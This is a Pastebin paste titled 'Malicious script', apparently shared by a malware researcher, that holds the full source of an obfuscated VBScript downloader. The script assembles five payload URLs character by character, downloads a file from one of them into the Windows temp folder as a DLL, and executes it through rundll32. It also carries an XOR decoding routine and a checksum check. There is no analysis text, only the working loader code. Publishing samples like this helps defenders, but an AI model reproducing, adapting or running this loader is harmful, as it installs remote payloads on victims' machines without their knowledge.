SHARE
TWEET

Malicious script

dynamoo Oct 28th, 2016 129 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On Error Resume Next
  2. Const Kq2 = 1, Bl0 = 2, Ni = 8
  3. Const RFl1 = 1, Eb = 2, Wl4 = 2
  4. Const Fy = "437"
  5. Function RSb6(Tv3)
  6. Dim XSf(255), UYz, VEk8
  7. XSf(128)=199
  8. XSf(129)=252
  9. XSf(130)=233
  10. XSf(131)=226
  11. XSf(132)=228
  12. XSf(133)=224
  13. XSf(134)=229
  14. XSf(135)=231
  15. XSf(136)=234
  16. XSf(137)=235
  17. XSf(138)=232
  18. XSf(139)=239
  19. XSf(140)=238
  20. XSf(141)=236
  21. XSf(142)=196
  22. XSf(143)=197
  23. XSf(144)=201
  24. XSf(145)=230
  25. XSf(146)=198
  26. XSf(147)=244
  27. XSf(148)=246
  28. XSf(149)=242
  29. XSf(150)=251
  30. XSf(151)=249
  31. XSf(152)=255
  32. XSf(153)=214
  33. XSf(154)=220
  34. XSf(155)=162
  35. XSf(156)=163
  36. XSf(157)=165
  37. XSf(158)=8359
  38. XSf(159)=402
  39. XSf(160)=225
  40. XSf(161)=237
  41. XSf(162)=243
  42. XSf(163)=250
  43. XSf(164)=241
  44. XSf(165)=209
  45. XSf(166)=170
  46. XSf(167)=186
  47. XSf(168)=191
  48. XSf(169)=8976
  49. XSf(170)=172
  50. XSf(171)=189
  51. XSf(172)=188
  52. XSf(173)=161
  53. XSf(174)=171
  54. XSf(175)=187
  55. XSf(176)=9617
  56. XSf(177)=9618
  57. XSf(178)=9619
  58. XSf(179)=9474
  59. XSf(180)=9508
  60. XSf(181)=9569
  61. XSf(182)=9570
  62. XSf(183)=9558
  63. XSf(184)=9557
  64. XSf(185)=9571
  65. XSf(186)=9553
  66. XSf(187)=9559
  67. XSf(188)=9565
  68. XSf(189)=9564
  69. XSf(190)=9563
  70. XSf(191)=9488
  71. XSf(192)=9492
  72. XSf(193)=9524
  73. XSf(194)=9516
  74. XSf(195)=9500
  75. XSf(196)=9472
  76. XSf(197)=9532
  77. XSf(198)=9566
  78. XSf(199)=9567
  79. XSf(200)=9562
  80. XSf(201)=9556
  81. XSf(202)=9577
  82. XSf(203)=9574
  83. XSf(204)=9568
  84. XSf(205)=9552
  85. XSf(206)=9580
  86. XSf(207)=9575
  87. XSf(208)=9576
  88. XSf(209)=9572
  89. XSf(210)=9573
  90. XSf(211)=9561
  91. XSf(212)=9560
  92. XSf(213)=9554
  93. XSf(214)=9555
  94. XSf(215)=9579
  95. XSf(216)=9578
  96. XSf(217)=9496
  97. XSf(218)=9484
  98. XSf(219)=9608
  99. XSf(220)=9604
  100. XSf(221)=9612
  101. XSf(222)=9616
  102. XSf(223)=9600
  103. XSf(224)=945
  104. XSf(225)=223
  105. XSf(226)=915
  106. XSf(227)=960
  107. XSf(228)=931
  108. XSf(229)=963
  109. XSf(230)=181
  110. XSf(231)=964
  111. XSf(232)=934
  112. XSf(233)=920
  113. XSf(234)=937
  114. XSf(235)=948
  115. XSf(236)=8734
  116. XSf(237)=966
  117. XSf(238)=949
  118. XSf(239)=8745
  119. XSf(240)=8801
  120. XSf(241)=177
  121. XSf(242)=8805
  122. XSf(243)=8804
  123. XSf(244)=8992
  124. XSf(245)=8993
  125. XSf(246)=247
  126. XSf(247)=8776
  127. XSf(248)=176
  128. XSf(249)=8729
  129. XSf(250)=183
  130. XSf(251)=8730
  131. XSf(252)=8319
  132. XSf(253)=178
  133. XSf(254)=9632
  134. XSf(255)=160
  135. s = ""
  136. For VEk8 = 0 To UBound(Tv3)
  137. If Tv3(VEk8) < 0 Or Tv3(VEk8) > 255 Then
  138. Err.Raise 50003, "", "a2s()", "", 0
  139. ElseIf Tv3(VEk8) >= 128 Then
  140. UYz = UYz & ChrW(XSf(Tv3(VEk8)))
  141. Else
  142. UYz = UYz & ChrW(Tv3(VEk8))
  143. End If
  144. Next
  145. RSb6 = UYz
  146. End Function
  147. Function Nu3(OPb)
  148. Dim Xj, PTi, UYz
  149. Set Xj = CreateObject("ADODB.Stream")
  150. Xj.type = Eb
  151. Xj.Charset = Fy
  152. Xj.Open
  153. Xj.LoadFromFile OPb
  154. UYz = Xj.ReadText
  155. Xj.Close
  156. Nu3 = WFo3(UYz)
  157. End Function
  158. Sub So(OPb, Tv3)
  159. Dim Xj, UYz
  160. Set Xj = CreateObject("ADODB.Stream")
  161. Xj.type = Eb
  162. Xj.Charset = Fy
  163. Xj.Open
  164. UYz = RSb6(Tv3)
  165. Xj.WriteText UYz
  166. Xj.SaveToFile OPb, Wl4
  167. Xj.Close
  168. End Sub
  169. Function PKe(Iu7)
  170. Dim UYz, LVb(0)
  171. If Iu7 <= 0 Then
  172. Err.Raise 50001, "", "makearrr()", "", 0
  173. ElseIf Iu7 = 1 Then
  174. PKe = LVb
  175. Else
  176. UYz = Space(Iu7-1)
  177. PKe = Split(UYz, " ")
  178. End If
  179. End Function
  180. Function THv7(url)
  181. Dim HWy, IWu8, PTi, VEk8
  182. Dim Ze, BLm3(1)
  183. Set HWy = CreateObject("Scripting.FileSystemObject")
  184. BLm3(0) = "WinHttp.WinHttpRequest.5.1"
  185. BLm3(1) = "MSXML2.XMLHTTP"
  186. For Each Ze in BLm3
  187. Err.Clear
  188. Set IWu8 = CreateObject(Ze)
  189. If Err.Number = 0 Then
  190. Exit For
  191. End If
  192. Next
  193. IWu8.Open "GET", url, False
  194. IWu8.Send
  195. PTi = PKe(LenB(IWu8.ResponseBody))
  196. For VEk8 = 1 To LenB(IWu8.ResponseBody)
  197. PTi(VEk8-1) = AscB(MidB(IWu8.ResponseBody, VEk8, 1))
  198. Next
  199. THv7 = PTi
  200. End Function
  201. Function Re1()
  202. Dim IRj, Ji, UUr5
  203. Set IRj = CreateObject("WScript.Shell")
  204. Set Ji = IRj.Environment("System")
  205. UUr5 = Ji("PROCESSOR_ARCHITECTURE")
  206. If LCase(UUr5) = "amd64" Then
  207. Re1 = IRj.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
  208. Else
  209. Re1 = IRj.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
  210. End If
  211. End Function
  212. Sub LBd(Ix, Lw1, Ut)
  213. Dim IRj, HWy, Mm, MOd4, KNf
  214. Set IRj = CreateObject("WScript.Shell")
  215. Set HWy = CreateObject("Scripting.FileSystemObject")
  216. Set Mm = HWy.GetFile(Ix)
  217. MOd4 = Mm.ShortPath
  218. KNf = Re1() + " " + MOd4 + "," + Lw1 + " " + Ut
  219. If 2 > 1 Then
  220. IRj.Run(KNf)
  221. End If
  222. End Sub
  223. Function Ty(Ix)
  224. Dim HWy
  225. Set HWy = CreateObject("Scripting.FileSystemObject")
  226. Ty = HWy.FileExists(Ix)
  227. End Function
  228. Function Ex6(Ix)
  229. Dim HWy, Mm
  230. Set HWy = CreateObject("Scripting.FileSystemObject")
  231. Set Mm = HWy.GetFile(Ix)
  232. Ex6 = Mm.ShortPath
  233. End Function
  234. Function BWg(KQg2, Rd0)
  235. Dim Iu7
  236. Iu7 = CDbl(Int(CDbl(KQg2)/CDbl(Rd0)))
  237. BWg = CDbl(KQg2) - Iu7 * CDbl(Rd0)
  238. End Function
  239. Function Vu(BBa, UYz)
  240. UYz(1) = 172 * UYz(1) Mod 30307
  241. UYz(0) = 171 * UYz(0) Mod 30269
  242. UYz(2) = 170 * UYz(2) Mod 30323
  243. Dim Xf3
  244. Xf3 = BWg((CDbl(UYz(0))/30269.0 + CDbl(UYz(1))/30307.0 + CDbl(UYz(2))/30323.0), 1.0)
  245. Vu = Int(Xf3 * CDbl(BBa))
  246. End Function
  247. Function Kx(PTi, RBu)
  248. Dim PIq5(2), Pj1, Zi, Ya2, VEk8
  249. If UBound(PTi) < 3 Then
  250. Err.Raise 50004, "", "size of array muzt be >= 4", "", 0
  251. End If
  252. Pj1 = PKe(UBound(PTi) - 3)
  253. PIq5(0) = RBu(0)
  254. PIq5(1) = RBu(1)
  255. PIq5(2) = RBu(2)
  256. For VEk8 = 0 To UBound(PTi)
  257. PTi(VEk8) = PTi(VEk8) Xor Vu(256, PIq5)
  258. Next
  259. Zi = PTi(UBound(PTi)-3)+(PTi(UBound(PTi)-2)*256)+(PTi(UBound(PTi)-1)*256*256)+(PTi(UBound(PTi))*256*256*256)
  260. Ya2 = VUf9
  261. For VEk8 = 0 To UBound(Pj1)
  262. Pj1(VEk8) = PTi(VEk8)
  263. Ya2 = (Ya2 + PTi(VEk8)) Mod 1000000000
  264. Next
  265. If Ya2 <> Zi Then
  266. Err.Raise 50005, "", "checksum error", "", 0
  267. End If
  268. Kx = Pj1
  269. End Function
  270. Function GEq(TOv6)
  271. GEq = CInt(TOv6*Rnd())
  272. End Function
  273. Sub Hx(Oi)
  274. WScript.Sleep(Oi)
  275. End Sub
  276. Randomize
  277. Dim WQa2(2), VUf9, VIb(4), OPb
  278. WQa2(0) = 6575
  279. WQa2(1) = 24677
  280. WQa2(2) = 15342
  281. VUf9 = 46
  282. If 1=1 Then
  283. VIb(0) = "http://" & "a" & "n" & "g" & "u" & "n" & "d" & "o" & "v" & "i" & "z" & "." & "c" & "o" & "m" & "/" & "l" & "h" & "k" & "9" & "6" & "w" & "x"
  284. End If
  285. If 1=1 Then
  286. VIb(1) = "http://" & "a" & "1" & "p" & "l" & "u" & "s" & "2" & "." & "d" & "e" & "/" & "l" & "j" & "w" & "x" & "w" & "6" & "v" & "h"
  287. End If
  288. If 1=1 Then
  289. VIb(2) = "http://" & "e" & "n" & "z" & "y" & "m" & "a" & "." & "e" & "s" & "/" & "l" & "p" & "z" & "d" & "1" & "g" & "e" & "v"
  290. End If
  291. If 1=1 Then
  292. VIb(3) = "http://" & "z" & "l" & "o" & "t" & "y" & "s" & "a" & "l" & "m" & "o" & "." & "n" & "e" & "t" & "/" & "0" & "z" & "x" & "0" & "k" & "e" & "n" & "3"
  293. End If
  294. If 1=1 Then
  295. VIb(4) = "http://" & "a" & "o" & "t" & "e" & "a" & "t" & "r" & "i" & "a" & "l" & "." & "n" & "e" & "t" & "/" & "1" & "4" & "2" & "y" & "5" & "x"
  296. End If
  297. OPb = "vJlvsuTTmqgiF"
  298. Dim IRj, Lv, Ov6, Wg
  299. Set objShell = CreateObject("WScript.Shell")
  300. Lv = objShell.ExpandEnvironmentStrings("%" & "TEMP%")
  301. Dim Ag, AKw8, Ab7, Hk, VEk8
  302. AKw8 = False
  303. For VEk8=0 To 10: Do
  304. Ov6 = Lv + "\" + OPb + CStr(VEk8) + ".dll"
  305. If Ty(Ov6) Then
  306. Wg = Ex6(Ov6) & ".txt"
  307. If Ty(Wg) Then
  308. WScript.Quit(0)
  309. End If
  310. End If
  311. If Not AKw8 Then
  312. Ag = GEq(UBound(VIb))
  313. Ab7 = THv7(VIb(Ag))
  314. If Err.Number <> 0 Then
  315. Exit Do
  316. End If
  317. Hk = Ab7  ' Kx(Ab7, WQa2)
  318. If Err.Number <> 0 Then
  319. Exit Do
  320. End If
  321. So Ov6, Hk
  322. If Err.Number <> 0 Then
  323. Exit Do
  324. End If
  325. AKw8 = True
  326. End If
  327. LBd Ov6, "E"&"nhancedStoragePasswordConfig", "147"
  328. Hx 24899
  329. Loop While False: Next
  330. If 3=3 Then
  331. WScript.Quit(1)
  332. End If
RAW Paste Data
Top